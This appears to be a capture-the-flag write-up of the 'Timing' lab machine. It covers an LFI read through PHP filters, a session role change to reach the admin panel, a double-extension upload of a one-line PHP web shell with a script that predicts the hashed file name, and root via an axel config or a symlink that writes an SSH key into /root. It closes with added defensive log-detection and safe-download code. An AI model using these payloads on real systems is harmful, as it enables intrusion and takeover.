Timing was a medium rated Linux machine. It involved fuzzing for files and finding an LFI, which let us view the source code of the application and log into the admin panel by modifying the role parameter. The admin panel had an upload function that accepts image files only, which can easily be bypassed by adding a php extension before the image extension. Through the LFI we can read how the application generates the hashed name of the uploaded file, which lets us reach the uploaded php file and execute it through the php filter, giving us a web shell. In the /opt directory an archive can be found containing git commits that give us the password for the aaron user to log in over ssh; that user has permission to run a custom binary, netutils, as the root user.
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
PORT 80 (HTTP)
On the webserver we can see a login page.
I couldn't find anything else. I tried a simple SQLi but it didn't work, and tried admin:admin, which didn't work either. So, fuzzing for files with gobuster.
Running gobuster with the php extension
gives us a file, image.php, but viewing that file won't return anything, as it's a php file and so it gets executed rather than shown.
I then ran wfuzz to see if I could find any parameters, and found img:
wfuzz -c -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u "http://10.129.245.78/image.php?FUZZ=/etc/passwd" --hw 0
Passing /etc/passwd to this parameter won't give us anything, as it's blacklisted.
So we can try php filters; here I used the filter's decoder just to read the passwd file.
Now we can read the php files as well.
This was the source code of image.php; let's look at login.php.
It's using db_conn.php, so maybe that will have credentials.
Checking the other php files, there was a file named admin_auth_check which checks whether role is set to 1:
<?php
include_once "auth_check.php";
if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
    echo "No permission to access this panel!";
    header('Location: ./index.php');
    die();
}
?>
But we can't do anything from this point, so moving on: we got a password from the db file but it didn't work anywhere. From the passwd file we have a user aaron, so let's try to log in with aaron:aaron.
Luckily this worked; now we can see that we can update our profile.
So let's capture this request in Burp Suite and see what parameters are being set.
This is making a POST request to profile_update.php, so let's see its source code through the LFI.
In the source code it takes a POST parameter role and stores it in our php session; we can change it to 1 to become admin.
On refreshing the page we can see that we have access to the admin panel.
Foothold
Looking at the source code of upload.php, it names the uploaded file by taking the md5 hash of the string $file_hash (the literal string, not the variable) followed by the current time, then appending _ and finally the original file name with its extension.
So I copied the source code and added the filename shell.php.jpg, which is the file I created to bypass the upload filter for the php extension:
<?php
// Same naming scheme as upload.php: md5 of the literal string '$file_hash'
// plus the current Unix time, then '_' and the original file name.
$file_name = md5('$file_hash' . time()) . '_' . 'shell.php.jpg';
echo $file_name."\n";
?>
and the contents of the uploaded php file are:
<?php
system($_GET['cmd']);
?>
Now we need to synchronize our clock with the target machine using timedatectl set-timezone UTC.
In order to upload the file and know its name, we need to keep running the php script, upload the file, and then pass the filenames we got from the script to gobuster.
We started to get a hit on our uploaded file, so we now know its name.
But the server won't execute our php file. Remember that there was a php file image.php with an LFI that includes a file through a GET parameter, so let's include the uploaded file with that.
I later uploaded phpbash, which is an interactive php web shell:
https://github.com/Arrexel/phpbash
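Each step of this foothold leaves a distinctive trace in the Apache access log: php://filter in the img parameter, a burst of 404s while gobuster guesses the hashed upload name, and requests for a .php.jpg file. As an added example, not part of the original writeup, here is detection logic run over a few constructed log lines (the IPs and hash prefixes are made up):

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache access-log lines modelled on the chain in this writeup:
# php://filter reads through image.php, a gobuster burst against the upload
# directory and a request for a double-extension upload. Not real logs.
SAMPLE_LOG = """\
10.10.14.2 - - [01/Jan/2022:10:00:01 +0000] "GET /image.php?img=php://filter/convert.base64-encode/resource=login.php HTTP/1.1" 200 1843
10.10.14.2 - - [01/Jan/2022:10:00:02 +0000] "GET /image.php?img=php%3A%2F%2Ffilter/convert.base64-encode/resource=db_conn.php HTTP/1.1" 200 412
10.10.14.2 - - [01/Jan/2022:10:00:05 +0000] "GET /images/uploads/0a1b2c3d4e5f_shell.php.jpg HTTP/1.1" 404 275
10.10.14.2 - - [01/Jan/2022:10:00:05 +0000] "GET /images/uploads/1b2c3d4e5f6a_shell.php.jpg HTTP/1.1" 404 275
10.10.14.2 - - [01/Jan/2022:10:00:06 +0000] "GET /images/uploads/2c3d4e5f6a7b_shell.php.jpg HTTP/1.1" 404 275
10.10.14.2 - - [01/Jan/2022:10:00:06 +0000] "GET /images/uploads/3d4e5f6a7b8c_shell.php.jpg HTTP/1.1" 200 0
10.10.14.9 - - [01/Jan/2022:10:01:00 +0000] "GET /image.php?img=logo.png HTTP/1.1" 200 5123
"""

# Combined-format parser (only the fields the rules need) and the three rules.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
WRAPPER_RE = re.compile(r'(?:^|[=/&])(?:php|data|phar|expect)://', re.I)   # stream wrapper in a value
TRAVERSAL_RE = re.compile(r'(?:^|[/=])\.\.(?:/|$)')                       # ../ style traversal
DOUBLE_EXT_RE = re.compile(r'\.ph(?:p\d?|tml|ar)\.[a-z0-9]{2,4}$', re.I)  # shell.php.jpg and friends

def analyze(log_text, burst_threshold=3):
    """Return sorted (ip, rule, detail) findings for the behaviours above."""
    findings = set()
    not_found = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, target, status = m['ip'], unquote(m['target']), m['status']
        path, _, query = target.partition('?')
        if WRAPPER_RE.search(path) or WRAPPER_RE.search(query):
            findings.add((ip, 'php-wrapper-in-request', target))
        if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(query):
            findings.add((ip, 'path-traversal', target))
        if DOUBLE_EXT_RE.search(path):
            findings.add((ip, 'double-extension-request', path))
        if status == '404':
            not_found[ip] += 1
    for ip, n in not_found.items():
        if n >= burst_threshold:
            findings.add((ip, 'not-found-burst', f'{n} responses with status 404'))
    return sorted(findings)

if __name__ == '__main__':
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```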
Privilege Escalation (aaron)
Going into the /opt folder we see a backup of the site in an archive.
So let's copy it to the web root directory (/var/www/html).
Perfect, now we can easily request this archive.
Notice that we have a .git directory, so let's look at the commits made to this repository using git show.
We get a second password; this lets us log in as the aaron user.
Privilege Escalation (root)
Doing sudo -l, aaron can run netutils as the root user.
And this isn't really a binary, it's a bash script that runs a jar file.
But we can't actually read it since it's under the /root directory and we don't have permission to read it. On executing it we get two options we can use: download a file from ftp or from http.
I provided localhost because there's a web service running; the result will be saved in a file called default in the current directory, owned by the root user.
We don't know what it runs to fetch this page, so I uploaded pspy, which is a process monitor.
This tells us that it runs axel, which is a file download accelerator for Linux. I tried to look for exploits for it but there weren't any; googling around I found a configuration file for axel which defines what the filename should be when an index page is downloaded:
https://github.com/FiloSottile/axel/blob/master/axelrc.example
This part is commented out, so uncomment it and, instead of default, change it to the /root/authorized_keys file. It will now download the index.html page to that path. Let's generate an ssh key pair with ssh-keygen, rename our id_rsa.pub to index.html, and transfer this config file onto the machine, naming it .axelrc.
Now log in with the ssh key as the root user.
Method #2
Another way to get root is to make a symlink to /root/.ssh/authorized_keys, which is the source; you can name the symlink anything you want, but make sure the downloaded filename matches the symlink.
ln -s /root/.ssh/authorized_keys/ abc
Now host the file using apache or python3, then just log in with ssh as the root user.
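Both root methods rely on netutils writing wherever its caller points it: an output name taken from a user-controlled config file, or a symlink planted in the working directory. As an added example (not the netutils or axel code from the box; the file and directory names are constructed), this is how a privileged downloader can refuse both, with a small demo that checks the protected file stays untouched:

```python
import os
import tempfile

class UnsafeDestination(Exception):
    """Raised when the requested output location must not be written."""

def safe_output_path(name, outdir):
    """Accept only a bare file name and place it inside outdir. A name carrying
    a directory component (the /root/authorized_keys override from a config
    file) or '..' is rejected before anything is opened."""
    if not name or name in ('.', '..') or name != os.path.basename(name):
        raise UnsafeDestination(f'refusing output name {name!r}')
    return os.path.join(outdir, name)

def write_download(name, data, outdir):
    """Create the file with O_CREAT|O_EXCL|O_NOFOLLOW: a pre-existing entry, in
    particular a symlink planted by the invoking user, is never followed."""
    path = safe_output_path(name, outdir)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, 'O_NOFOLLOW', 0)
    try:
        fd = os.open(path, flags, 0o644)
    except FileExistsError as exc:
        raise UnsafeDestination(f'{path} already exists') from exc
    with os.fdopen(fd, 'wb') as fh:
        fh.write(data)
    return path

def demo():
    """Constructed scenario: 'victim' plays /root/.ssh/authorized_keys."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, 'victim')
        with open(victim, 'wb') as fh:
            fh.write(b'original keys\n')
        work = os.path.join(tmp, 'work')   # directory the tool is run from
        os.mkdir(work)
        os.symlink(victim, os.path.join(work, 'abc'))  # the symlink from method #2
        for name in ('abc', '../victim', '/root/authorized_keys', 'index.html'):
            try:
                write_download(name, b'attacker key\n', work)
                results[name] = 'written'
            except UnsafeDestination:
                results[name] = 'refused'
        with open(victim, 'rb') as fh:
            results['victim_intact'] = fh.read() == b'original keys\n'
    return results

if __name__ == '__main__':
    print(demo())
```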